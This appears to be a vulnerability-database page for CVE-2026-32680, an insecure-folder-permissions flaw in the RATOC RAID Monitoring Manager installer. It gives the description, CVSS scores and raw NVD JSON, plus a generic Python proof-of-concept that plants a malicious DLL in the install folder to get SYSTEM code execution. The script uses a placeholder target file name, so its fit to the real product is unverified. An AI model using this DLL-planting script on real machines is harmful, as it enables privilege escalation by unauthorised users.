Security Vulnerability Report
中文
CVE-2026-32680 CVSS 7.8 HIGH

CVE-2026-32680

Published: 2026-03-26 07:16:20
Last Modified: 2026-05-19 15:26:22

Description

The installer of RATOC RAID Monitoring Manager for Windows allows to customize the installation folder. If the installation folder is customized to some non-default one, the folder may be left with un-secure ACLs and non-administrative users can alter contents of that folder. It may allow a non-administrative user to execute an arbitrary code with SYSTEM privilege.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RATOC RAID Monitoring Manager for Windows (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import shutil # Configuration # Target installation directory (custom path) target_directory = r"C:\RATOC\RAIDManager" # Malicious payload (e.g., a DLL or executable) malicious_payload_path = r"C:\Temp\evil_payload.dll" target_file_name = "vulnerable_component.dll" def exploit(): print(f"[*] Checking permissions on {target_directory}...") if not os.path.exists(target_directory): print(f"[-] Target directory does not exist.") return # Attempt to write a test file to verify Write permissions test_file = os.path.join(target_directory, "permission_test.txt") try: with open(test_file, 'w') as f: f.write("ACL Test") print("[+] Write permission confirmed. Directory is vulnerable.") os.remove(test_file) except PermissionError: print("[-] No write permission. Exploit failed.") return except Exception as e: print(f"[-] Error occurred: {e}") return # Proceed to copy the malicious payload destination_path = os.path.join(target_directory, target_file_name) try: print(f"[*] Backing up original file (if exists)...") if os.path.exists(destination_path): shutil.copy(destination_path, destination_path + ".bak") print(f"[*] Copying malicious payload to {destination_path}...") shutil.copy(malicious_payload_path, destination_path) print("[+] Exploit successful! ") print("[+] The malicious file has been placed in the application directory.") print("[+] Wait for the service to restart or the system to reboot for code execution as SYSTEM.") except Exception as e: print(f"[-] Failed to copy payload: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32680", "sourceIdentifier": "[email protected]", "published": "2026-03-26T07:16:20.220", "lastModified": "2026-05-19T15:26:21.840", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The installer of RATOC RAID Monitoring Manager for Windows allows to customize the installation folder. If the installation folder is customized to some non-default one, the folder may be left with un-secure ACLs and non-administrative users can alter contents of that folder. It may allow a non-administrative user to execute an arbitrary code with SYSTEM privilege."}, {"lang": "es", "value": "El instalador de RATOC RAID Monitoring Manager para Windows permite personalizar la carpeta de instalación. Si la carpeta de instalación se personaliza a una no predeterminada, la carpeta puede quedar con ACLs inseguras y los usuarios no administrativos pueden alterar el contenido de esa carpeta. Esto puede permitir a un usuario no administrativo ejecutar código arbitrario con privilegios de SYSTEM."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN08057419/", "source": "[email protected]"}, {"url": "https://www.ratocsystems.com/topics/userinfo/raidmanager202508/", "source": "[email protected]"}]}}